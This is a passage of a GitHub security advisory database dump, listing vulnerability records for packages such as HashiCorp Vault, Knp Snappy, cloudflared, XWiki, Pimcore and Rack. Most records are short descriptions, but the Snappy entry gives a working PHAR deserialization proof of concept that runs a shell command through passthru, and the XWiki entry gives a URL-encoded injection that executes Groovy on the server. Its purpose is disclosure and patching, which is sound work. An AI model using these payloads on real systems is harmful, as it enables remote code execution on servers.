[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-gmrf-99gw-vvwj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-46876'}, {'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/commit/b496f073c3f03707d3531a6941dc098b84e3cbed'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:58:01Z', 'nvd_published_at': '2023-03-12T05:15:00Z'}
|
1.4.0
|
GHSA-hwc3-3qh6-r4gg
|
2023-04-07T19:22:54Z
|
2023-03-30T03:30:38Z
| null |
['CVE-2023-0665']
|
HashiCorp Vault's PKI mount vulnerable to denial of service
|
HashiCorp Vault's PKI mount issuer endpoints did not correctly authorize access to remove an issuer or modify issuer metadata, potentially resulting in denial of service of the PKI mount. This bug did not affect public or private key material, trust chains or certificate issuance. Fixed in Vault 1.13.1, 1.12.5, and 1.11.9.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0665'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-11-vault-s-pki-issuer-endpoint-did-not-correctly-authorize-access-to-issuer-metadata/52079/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230526-0008/'}]
|
{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T19:22:54Z', 'nvd_published_at': '2023-03-30T01:15:00Z'}
|
1.4.0
|
GHSA-pmhg-cmjc-3875
|
2023-03-23T18:22:43Z
|
2023-03-18T21:30:23Z
| null |
['CVE-2023-28609']
|
Ansible Semaphore mishandles authentication
|
api/auth.go in Ansible Semaphore before 2.8.89 mishandles authentication.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ansible-semaphore/semaphore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.89'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28609'}, {'type': 'WEB', 'url': 'https://github.com/ansible-semaphore/semaphore/commit/3e4a62b7f2b1ef0660c9fb839818a53c80a5a8b1'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible-semaphore/semaphore'}, {'type': 'WEB', 'url': 'https://github.com/ansible-semaphore/semaphore/releases/tag/v2.8.89'}]
|
{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-20T21:14:43Z', 'nvd_published_at': '2023-03-18T21:15:00Z'}
|
1.4.0
|
GHSA-gq6w-q6wh-jggc
|
2023-03-20T13:59:30Z
|
2023-03-17T18:24:24Z
| null |
['CVE-2023-28115']
|
PHAR deserialization allowing remote code execution
|
## Description
snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the `generateFromHtml()` function, it will invoke deserialization.
## Proof of Concept
Install Snappy via composer require `knplabs/knp-snappy`. After that, under snappy directory, create an `index.php` file with this vulnerable code.
```php
<?php
// index.php
// include autoloader
require __DIR__ . '/vendor/autoload.php';
// reference the snappy namespace
use Knp\Snappy\Pdf;
// vulnerable object
class VulnerableClass {
public $fileName;
public $callback;
function __destruct() {
call_user_func($this->callback, $this->fileName);
}
}
$snappy = new Pdf('/usr/local/bin/wkhtmltopdf');
// generate pdf from html content and save it at phar://poc.phar
$snappy->generateFromHtml('<h1>Bill</h1><p>You owe me money, dude.</p>', 'phar://poc.phar');
```
As an attacker, we going to generate the malicious phar using this script.
```php
<?php
// generate_phar.php
class VulnerableClass { }
// Create a new instance of the Dummy class and modify its property
$dummy = new VulnerableClass();
$dummy->callback = "passthru";
$dummy->fileName = "uname -a > pwned"; //our payload
// Delete any existing PHAR archive with that name
@unlink("poc.phar");
// Create a new archive
$poc = new Phar("poc.phar");
// Add all write operations to a buffer, without modifying the archive on disk
$poc->startBuffering();
// Set the stub
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");
// Add a new file in the archive with "text" as its content
$poc["file"] = "text";
// Add the dummy object to the metadata. This will be serialized
$poc->setMetadata($dummy);
// Stop buffering and write changes to disk
$poc->stopBuffering();
?>
```
Then run these command to generate the file
```php
php --define phar.readonly=0 generate_phar.php
```
Then execute index.php with `php index.php`. You will see a file named `pwned` will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.
## Impact
This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.
## Occurences
<https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670>
## References
- <https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/>
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'knplabs/knp-snappy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28115'}, {'type': 'WEB', 'url': 'https://github.com/KnpLabs/snappy/pull/469'}, {'type': 'WEB', 'url': 'https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6'}, {'type': 'WEB', 'url': 'https://github.com/KnpLabs/snappy/commit/b66f79334421c26d9c244427963fa2d92980b5d3'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-28115.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/KnpLabs/snappy'}, {'type': 'WEB', 'url': 'https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670'}, {'type': 'WEB', 'url': 'https://github.com/KnpLabs/snappy/releases/tag/v1.4.2'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-gq6w-q6wh-jggc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T18:24:24Z', 'nvd_published_at': '2023-03-17T22:15:00Z'}
|
1.4.0
|
GHSA-7mjv-x3jf-545x
|
2023-03-21T22:32:50Z
|
2023-03-21T22:32:50Z
| null |
['CVE-2023-1314']
|
cloudflared's Installer has Local Privilege Escalation Vulnerability
|
### Impact
A vulnerability has been discovered in cloudflared's installer (<= 2023.3.0) for Windows 32-bits devices that allows a local attacker with no administrative permissions to escalate their privileges on the affected device. This vulnerability exists because the MSI installer used by cloudflared relied on a world-writable directory.
An attacker with local access to the device (without Administrator rights) can use symbolic links to trick the MSI installer into deleting files in locations that the attacker would otherwise have no access to. By creating a symlink from the world-writable directory to the target file, the attacker can manipulate the MSI installer's repair functionality to delete the target file during the repair process.
Exploitation of this vulnerability could allow an attacker to delete important system files or replace them with malicious files, potentially leading to the affected device being compromised.
**The cloudflared client itself is not affected by this vulnerability, only the installer for 32-bit Windows devices.**
### Patches
A new installer was released as part of version 2023.3.1, corresponding to pseudoversion 0.0.0-20230313153246-f686da832f85 on pkg.go.dev. Users are encouraged to remove old installers from their systems.
### References
[Cloudflared Releases](https://github.com/cloudflare/cloudflared/releases)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cloudflared'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20230313153246-f686da832f85'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cloudflared/security/advisories/GHSA-7mjv-x3jf-545x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1314'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cloudflared/commit/9c15f31d003bebfbe6467c2b42972df3e7c9b886'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cloudflared'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cloudflared/releases'}]
|
{'cwe_ids': ['CWE-59'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:32:50Z', 'nvd_published_at': '2023-03-21T12:15:00Z'}
|
1.4.0
|
GHSA-p8cq-pv6w-6rwx
|
2023-03-14T19:39:24Z
|
2023-03-03T03:30:24Z
| null |
['CVE-2023-1160']
|
Cockpit Uses Platform-Dependent Third Party Components
|
Use of Platform-Dependent Third Party Components in GitHub repository cockpit-hq/cockpit 2.3.9 and prior. A patch is available and anticipated to be part of version 2.4.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.3.9'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1160'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/690016208850f2d788ebc3c67884d4c692587eb8'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3ce480dc-1b1c-4230-9287-0dc3b31c2f87'}]
|
{'cwe_ids': ['CWE-1103'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T23:00:46Z', 'nvd_published_at': '2023-03-03T02:15:00Z'}
|
1.4.0
|
GHSA-xvfj-84vc-hrmf
|
2023-03-23T16:30:25Z
|
2023-03-21T06:30:17Z
| null |
['CVE-2023-1536']
|
Answer vulnerable to Stored Cross-site Scripting
|
Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.7.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.7'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1536'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/c3743bad4f2a69f69f8f1e1e5b4b6524fc03da25'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/538207f4-f805-419a-a314-51716643f05e'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:32:01Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
|
1.4.0
|
GHSA-795w-7426-m94j
|
2023-03-15T19:18:27Z
|
2023-03-10T18:30:22Z
| null |
['CVE-2021-33360']
|
stoqey/gnuplot is vulnerable to command injection
|
An issue found in Stoqey gnuplot v.0.0.3 and earlier allows attackers to execute arbitrary code via the src/index.ts, plotCallack, child_process, and/or filePath parameter(s).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@stoqey/gnuplot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33360'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4811/'}, {'type': 'PACKAGE', 'url': 'https://github.com/stoqey/gnuplot'}, {'type': 'WEB', 'url': 'https://github.com/stoqey/gnuplot/blob/cd76060a15f58348baeef1c5fd867ce856515949/src/index.ts#L211-L217'}]
|
{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-10T21:52:17Z', 'nvd_published_at': '2023-03-10T16:15:00Z'}
|
1.4.0
|
GHSA-79hx-g43v-xfmr
|
2023-03-23T19:01:37Z
|
2023-03-21T06:30:16Z
| null |
['CVE-2023-1543']
|
Answer vulnerable to Insufficient Session Expiration
|
Insufficient Session Expiration in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1543'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/cd742b75605c99776f32d271c0a60e0f468e181c'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/f82388d6-dfc3-4fbc-bea6-eb40cf5b2683'}]
|
{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:31:39Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
|
1.4.0
|
GHSA-6qjm-39vh-729w
|
2023-03-31T17:11:48Z
|
2023-03-31T17:11:48Z
| null |
['CVE-2023-1702']
|
Pimcore Cross-site Scripting in Predefined Asset Metadata module in Settings
|
### Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites.
### Patches
Update to version 10.5.20 or apply this patch manually https://github.com/pimcore/pimcore/pull/14721.patch
### Workarounds
Apply patch manually https://github.com/pimcore/pimcore/pull/14721.patch
### References
https://huntr.dev/bounties/d8a47f29-3297-4fce-b534-e1d95a2b3e19
|
[]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.20'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-6qjm-39vh-729w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1702'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14721.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/2b997737dd6a60be2239a51dd6d9ef5881568e6d'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d8a47f29-3297-4fce-b534-e1d95a2b3e19'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T17:11:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7r35-chv4-xr3r
|
2023-03-31T17:17:04Z
|
2023-03-31T17:17:04Z
| null |
['CVE-2023-1701']
|
Pimcore vulnerable to Reflected XSS in Predefined Properties module in Settings
|
### Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites.
### Patches
Update to version 10.5.20 or apply this patch manually https://github.com/pimcore/pimcore/pull/14721.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/14721.patch manually.
### References
https://huntr.dev/bounties/64f943c4-68e5-4ef8-82f6-9c4abe928256/
|
[]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.20'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-7r35-chv4-xr3r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1701'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14721.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/2b997737dd6a60be2239a51dd6d9ef5881568e6d'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/64f943c4-68e5-4ef8-82f6-9c4abe928256'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T17:17:04Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-x2qm-r4wx-8gpg
|
2023-03-03T22:51:02Z
|
2023-03-03T22:51:02Z
| null |
['CVE-2023-26477']
|
org.xwiki.platform:xwiki-platform-flamingo-theme-ui Eval Injection vulnerability
|
### Impact
It's possible to inject arbitrary wiki syntax including Groovy, Python and Velocity script macros via the `newThemeName` request parameter (URL parameter), in combination with additional parameters `form_token=1&action=create`.
For instance: [http://127.0.0.1:8080/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?newThemeName=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D&form_token=1&action=create](http://127.0.0.1:8080/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?**newThemeName**=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D&form_token=1&action=create) will execute the following groovy code: `println("hello from groovy!")` on the server.
### Patches
This has been patched in the supported versions 13.10.10, 14.9-rc-1, and 14.4.6.
### Workarounds
It is possible to edit `FlamingoThemesCode.WebHomeSheet` and manually perform the changes from [the patch fixing the issue](https://github.com/xwiki/xwiki-platform/commit/ea2e615f50a918802fd60b09ec87aa04bc6ea8e2#diff-e2153fa59f9d92ef67b0afbf27984bd17170921a3b558fac227160003d0dfd2aR283-R284).
### References
- https://github.com/xwiki/xwiki-platform/commit/ea2e615f50a918802fd60b09ec87aa04bc6ea8e2#diff-e2153fa59f9d92ef67b0afbf27984bd17170921a3b558fac227160003d0dfd2aR283-R284
- https://jira.xwiki.org/browse/XWIKI-19757
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-theme-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.4'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-theme-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-theme-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-x2qm-r4wx-8gpg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26477'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/ea2e615f50a918802fd60b09ec87aa04bc6ea8e2#diff-e2153fa59f9d92ef67b0afbf27984bd17170921a3b558fac227160003d0dfd2aR283-R284'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19757'}]
|
{'cwe_ids': ['CWE-94', 'CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:51:02Z', 'nvd_published_at': '2023-03-02T18:15:00Z'}
|
1.4.0
|
GHSA-vcph-37mh-fqrh
|
2023-08-24T20:07:48Z
|
2023-03-07T18:30:39Z
| null |
['CVE-2023-27522']
|
Apache HTTP Server via mod_proxy_uwsgi HTTP response smuggling
|
HTTP Response Smuggling vulnerability in Apache HTTP Server via mod_proxy_uwsgi. This issue affects Apache HTTP Server from 2.4.30 through 2.4.55 and the uWSGI PyPI package prior to version 2.0.22. Special characters in the origin response header can truncate/split the response forwarded to the client.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'uWSGI'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.22'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27522'}, {'type': 'WEB', 'url': 'https://github.com/apache/httpd/commit/d753ea76b5972a85349b68c31b59d04c60014f2d'}, {'type': 'WEB', 'url': 'https://github.com/unbit/uwsgi/commit/58ee1df31fa9e9af106aaeabb82374c36b433822'}, {'type': 'WEB', 'url': 'https://github.com/unbit/uwsgi/commit/acb03530aaaeaa810f28a5b64da619525940f569'}, {'type': 'PACKAGE', 'url': 'https://github.com/unbit/uwsgi'}, {'type': 'WEB', 'url': 'https://httpd.apache.org/security/vulnerabilities_24.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/04/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202309-01'}, {'type': 'WEB', 'url': 'https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.22.html'}]
|
{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T20:07:48Z', 'nvd_published_at': '2023-03-07T16:15:00Z'}
|
1.4.0
|
GHSA-gwvm-vrp4-4pp5
|
2023-03-24T22:04:35Z
|
2023-03-24T22:04:35Z
| null |
['CVE-2023-28444']
|
angular-server-side-configuration information disclosure vulnerability in monorepo with node.js backend
|
### Impact
angular-server-side-configuration detects used environment variables in TypeScript (.ts) files during build time of an Angular CLI project. The detected environment variables are written to a ngssc.json file in the output directory.
During deployment of an Angular based app, the environment variables based on the variables from ngssc.json are inserted into the apps index.html (or defined index file).
With version 15 the environment variable detection was widened to the entire project, relative to the angular.json file from the Angular CLI. In a monorepo setup, this could lead to environment variables intended for a backend/service to be detected and written to the ngssc.json, which would then be populated and exposed via index.html.
This has NO IMPACT, in a plain Angular project that has no backend component.
### Patches
Vulnerability has been mitigated in 15.1.0, by adding an option `searchPattern` which restricts the detection file range by default.
```bash
# Update via npm
npm update angular-server-side-configuration
## Or more specific
npm install [email protected]
# Update via pnpm
pnpm update angular-server-side-configuration
## Or more specific
pnpm add [email protected]
# Update via yarn
yarn update angular-server-side-configuration
## Or more specific
yarn add [email protected]
```
### Workarounds
Manually edit or create ngssc.json or run a script after ngssc.json generation
### References
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'angular-server-side-configuration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '15.1.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/kyubisation/angular-server-side-configuration/security/advisories/GHSA-gwvm-vrp4-4pp5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28444'}, {'type': 'WEB', 'url': 'https://github.com/kyubisation/angular-server-side-configuration/commit/d701f51260637a84ede278e248934e0437a7ff86'}, {'type': 'PACKAGE', 'url': 'https://github.com/kyubisation/angular-server-side-configuration'}, {'type': 'WEB', 'url': 'https://github.com/kyubisation/angular-server-side-configuration/releases/tag/v15.1.0'}]
|
{'cwe_ids': ['CWE-200', 'CWE-538'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:04:35Z', 'nvd_published_at': '2023-03-24T20:15:00Z'}
|
1.4.0
|
GHSA-3h57-hmj3-gj3p
|
2023-03-16T21:38:54Z
|
2023-03-08T17:20:04Z
| null |
['CVE-2023-27530']
|
Rack has possible DoS Vulnerability in Multipart MIME parsing
|
There is a possible DoS vulnerability in the Multipart MIME parsing code in Rack. This vulnerability has been assigned the CVE identifier CVE-2023-27530.
Versions Affected: All. Not affected: None Fixed Versions: 3.0.4.2, 2.2.6.3, 2.1.4.3, 2.0.9.3
# Impact
The Multipart MIME parsing code in Rack limits the number of file parts, but does not limit the total number of parts that can be uploaded. Carefully crafted requests can abuse this and cause multipart parsing to take longer than expected.
All users running an affected release should either upgrade or use one of the workarounds immediately.
# Workarounds
A proxy can be configured to limit the POST body size which will mitigate this issue.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'rack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.9.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.4.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.6.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.4.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27530'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-27530-possible-dos-vulnerability-in-multipart-mime-parsing/82388'}, {'type': 'PACKAGE', 'url': 'https://github.com/rack/rack'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2023-27530.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/04/msg00017.html'}]
|
{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:20:04Z', 'nvd_published_at': '2023-03-10T22:15:00Z'}
|
1.4.0
|
GHSA-vp98-w2p3-mv35
|
2023-04-20T14:22:42Z
|
2023-03-10T15:30:43Z
| null |
['CVE-2023-26464']
|
Apache Log4j 1.x (EOL) allows Denial of Service (DoS)
|
** UNSUPPORTED WHEN ASSIGNED ** When using the Chainsaw or SocketAppender components with Log4j 1.x on JRE less than 1.7, an attacker that manages to cause a logging entry involving a specially-crafted (ie deeply nested) hashmap or hashtable (depending on which logging component is in use) to be processed could exhaust the available memory in the virtual machine and achieve Denial of Service when the object is deserialized. This issue affects Apache Log4j before 2. Affected users are recommended to update to Log4j 2.x. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.logging.log4j:log4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.4'}, {'fixed': '2.0.0'}]}]}]
|
